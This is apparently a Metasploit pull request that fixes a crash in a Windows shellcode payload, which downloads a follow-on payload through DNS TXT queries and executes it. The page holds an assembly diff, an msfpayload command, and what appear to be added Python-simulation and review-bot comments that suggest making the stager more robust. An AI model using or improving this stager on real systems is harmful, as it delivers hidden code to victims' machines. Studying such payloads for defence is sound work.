Improved payload dns_txt_query_exec #1057

merged 16 commits into from

3 participants


Fixed a possible payload crash on XP and Win7.
(did not test if patch works on other OSes)

Made payload a few bytes smaller

To test, feel free to run the setup at

./msfpayload windows/dns_txt_query_exec C

(you should get a messagebox)
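As an added illustration of what the payload's fetch loop does and what the new check at offset 0x18 in the diff below is testing (this is example code written for this page, not code from the PR, the module, or Metasploit): the script lays out 32-bit DNS_RECORD / DNS_TXT_DATA structures in a constructed heap, answers queries from a constructed zone table that stands in for DnsQuery_A, and stops the same way the shellcode does. The "<letter>.<zone>" naming, the raw single-string chunk encoding without NUL bytes, and all helper names (FakeHeap, build_txt_record, dns_query_a, fetch_payload, make_zone) are assumptions made here; the field offsets are those of the x86 DNS_RECORD from windns.h.

```python
import struct

# Field offsets of the 32-bit DNS_RECORD from windns.h; this example assumes
# that is the structure the payload walks. The fix reads the DWORD at 0x18.
OFF_PNEXT = 0x00          # PDNS_RECORD pNext
OFF_WTYPE = 0x08          # WORD wType
OFF_DWSTRINGCOUNT = 0x18  # Data.TXT.dwStringCount (first DWORD of Data)
OFF_PSTRINGARRAY = 0x1C   # Data.TXT.pStringArray[0]
DNS_TYPE_TEXT = 0x10
DNS_ERROR_RCODE_NAME_ERROR = 9003  # NXDOMAIN status as returned by DnsQuery_A


class FakeHeap:
    """Constructed 32-bit 'process memory' holding DNS_RECORD chains so the
    example can dereference pointers the way the shellcode does."""

    def __init__(self, base=0x00400000):
        self.base = base
        self.mem = bytearray()

    def alloc(self, data):
        addr = self.base + len(self.mem)
        self.mem += data
        return addr

    def dword(self, addr):
        return struct.unpack_from("<I", self.mem, addr - self.base)[0]

    def cstr(self, addr):
        start = addr - self.base
        return bytes(self.mem[start:self.mem.index(b"\0", start)])


def build_txt_record(heap, strings, pnext=0):
    """Lay out one DNS_RECORD of type TXT: 0x18 header bytes (pNext, pName,
    wType, wDataLength, Flags, dwTtl, dwReserved), then DNS_TXT_DATA, i.e.
    dwStringCount followed by the pStringArray pointers."""
    ptrs = [heap.alloc(s + b"\0") for s in strings]
    rec = struct.pack("<IIHHIII", pnext, 0, DNS_TYPE_TEXT, 0, 0, 300, 0)
    rec += struct.pack("<I", len(strings))
    rec += b"".join(struct.pack("<I", p) for p in ptrs)
    return heap.alloc(rec)


def dns_query_a(zone_data, heap, name):
    """Stand-in for DnsQuery_A: returns (status, pRecord), status 0 on success."""
    strings = zone_data.get(name)
    if strings is None:
        return DNS_ERROR_RCODE_NAME_ERROR, 0
    return 0, build_txt_record(heap, strings)


def fetch_payload(zone_data, zone):
    """Replay the payload's loop: query TXT for '<seq>.<zone>' starting at 'a',
    append the single string of each answer, and stop either when the query
    fails (the jnz jump_to_payload path) or when dwStringCount != 1 (the
    jne prepare_payload path). Returns (bytes, reason, chunks_fetched)."""
    heap = FakeHeap()
    buf = b""
    seq = ord("a")  # bl = 0x61
    chunks = 0
    while True:
        status, rec = dns_query_a(zone_data, heap, "%c.%s" % (seq, zone))
        if status != 0:
            return buf, "query_failed", chunks
        if heap.dword(rec + OFF_DWSTRINGCOUNT) != 1:
            return buf, "string_count", chunks
        buf += heap.cstr(heap.dword(rec + OFF_PSTRINGARRAY))
        chunks += 1
        seq += 1  # inc ebx: after 'z' (0x7a) the next label is '{', not 'aa'


def make_zone(zone, chunks):
    """Constructed zone data: chunk i is served as one TXT string at
    chr(ord('a') + i).zone. The single-letter sequence only covers a..z."""
    if len(chunks) > 26:
        raise ValueError("single-letter sequence only covers 26 chunks")
    return {"%c.%s" % (ord("a") + i, zone): [c] for i, c in enumerate(chunks)}


if __name__ == "__main__":
    zone = "example.org"
    data, why, n = fetch_payload(make_zone(zone, [b"\x90\x90", b"\xcc"]), zone)
    print(n, why, data)
```

Two behaviours are worth noticing when running it: an answer with zero or several TXT strings ends the fetch with whatever was already collected, and a 26-chunk zone ends only because the 27th query ("{.example.org") fails, which is the same path a resolver error on the very first query would take.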


Tested on Win2003 R2 SP2 as well, works fine.


Is this an extension of what we were working on in April? If so, just let me know if you want the server-side delivery code.


This is a bugfix to the existing module (which simply downloads a payload) - the modules we worked on in April allow us to download an executable... Maybe it's time to review those modules again & see what needs to be done to make them work reliably.


OK, sorry, didn't want to hijack the thread... let's chat offline and get the ball rolling again!

... and we return you to your regularly scheduled programming


What? Is it evening already? :)


Tested ok on Windows 7 SP1.

@wchen-r7 wchen-r7 merged commit 0bf92b5 into rapid7:master
Commits on Oct 24, 2012
  1. @corelanc0d3r
Commits on Oct 29, 2012
  1. @corelanc0d3r
Commits on Oct 30, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Oct 31, 2012
  1. @corelanc0d3r
Commits on Nov 3, 2012
  1. @corelanc0d3r
Commits on Nov 6, 2012
  1. @corelanc0d3r
Commits on Nov 7, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r: restored original file
Commits on Nov 8, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Nov 9, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Nov 12, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
  3. @corelanc0d3r
Showing with 7 additions and 7 deletions.
  1. +7 −7 modules/payloads/singles/windows/dns_txt_query_exec.rb
14 modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -160,7 +160,7 @@ def generate
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
- jmp next_mod ; Process this module
+ jmp.i8 next_mod ; Process this module
; actual routine
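Review bot: the `.i8` suffix on `jmp.i8 next_mod` forces an 8-bit displacement, so the back edge to `next_mod` in this module-walk loop must stay within 128 bytes of the jump. That is the size saving the PR description refers to, but the hunk gives no hint that the short form is deliberate; add a comment such as `; short jump, saves 3 bytes` and confirm that metasm refuses to assemble (rather than wrapping the displacement) if a later edit pushes the label out of range, so a regression fails at generate time instead of at run time.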
@@ -195,7 +195,7 @@ def generate
mov bl,0x61 ; first query, start with 'a'
- jmp get_dnsname ; get dnsname
+ jmp.i8 get_dnsname ; get dnsname
pop eax ; get ptr to dnsname (lpstrName)
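Review bot: `jmp.i8 get_dnsname` is a forward jump over the whole query/fetch body between here and the `get_dnsname` label (the `pop eax` that follows receives the string address, so this is the usual call/pop pattern and the domain string itself presumably sits after that call, outside this displacement). The body it skips grows in the hunk at line 225 (`[#{bufferreg}+0x18]` and `cmp eax,1` are longer than the `mov`/`test` they replace), so recheck that the distance still fits in a signed byte for the largest `#{bufferreg}` encoding the generator can pick, and note that in a comment next to the jump.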
@@ -215,7 +215,7 @@ def generate
call ebp ;
test eax, eax ; query ok ?
jnz jump_to_payload ; no, jump to payload
- jmp get_query_result ; eax = 0 : a piece returned, fetch it
+ jmp.i8 get_query_result ; eax = 0 : a piece returned, fetch it
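Review bot: `jnz jump_to_payload` after `test eax, eax` treats any non-zero return from the `call ebp` query as "no more pieces", so a resolver timeout or NXDOMAIN on the very first query jumps into a buffer that nothing has been written to. The sequence counter already distinguishes the two cases: `bl` starts at 0x61 and is incremented per fetched piece, so a `cmp bl, 0x61` / `je` to an exit (or to a retry) before `jump_to_payload` would keep a DNS failure from executing an empty buffer. At minimum the comment `; no, jump to payload` should say that query failure is the intended end-of-payload condition.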
@@ -225,9 +225,9 @@ def generate
xchg #{bufferreg},edx ; save start of heap
pop #{bufferreg} ; heap structure containing DNS results
- mov eax,[#{bufferreg}] ; if first dword has a non-null value, then stop
- test eax,eax
- jnz prepare_payload ; jmp to payload
+ mov eax,[#{bufferreg}+0x18] ; check if value at offset 0x18 is 0x1
+ cmp eax,1
+ jne prepare_payload ; jmp to payload
add #{bufferreg},#{wTypeOffset} ; get ptr to ptr to DNS reply
mov #{bufferreg},[#{bufferreg}] ; get ptr to DNS reply
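Review bot: `mov eax,[#{bufferreg}+0x18]` needs the 0x18 named rather than commented as "value at offset 0x18": on the 32-bit DNS_RECORD the Data union starts at 0x18 and for a TXT answer its first DWORD is DNS_TXT_DATA.dwStringCount, so `cmp eax,1` / `jne prepare_payload` means "stop unless the record carries exactly one string". Define it alongside `#{wTypeOffset}` (for example `dwStringCountOffset = 0x18`) and document two consequences in the module: the check assumes the x86 record layout, and a TXT record split into several strings (the normal encoding for data longer than 255 bytes) is treated as end of payload, so the server side must publish one string per record. Since this replaces the old `mov eax,[#{bufferreg}]` / `test eax,eax` check on `pNext`, a chained record no longer stops the loop; stating that in the commit message would make the XP/Win7 crash fix understandable later.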
@@ -243,7 +243,7 @@ def generate
push edi ;
inc ebx ; increment sequence
xchg #{bufferreg},edx ; restore start of heap
- jmp dnsquery ; try to get the next piece, if any
+ jmp.i8 dnsquery ; try to get the next piece, if any
mov #{bufferreg},edx
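Review bot: `inc ebx` steps the sequence label that started at 0x61 ('a' at line 195), so after 'z' (0x7a) the next query name begins with '{', which is not a valid hostname label character; the payload is therefore limited to 26 pieces unless a wrap to a second character exists elsewhere. Either document that limit in the module description and the DNSZONE option text or extend the sequence (for example reset `bl` to 0x61 and bump a second counter byte). `jmp.i8 dnsquery` is also the longest of the short back edges in this patch, spanning the whole query and fetch body that the hunk at line 225 enlarged, so its reach deserves the same check and comment as the others.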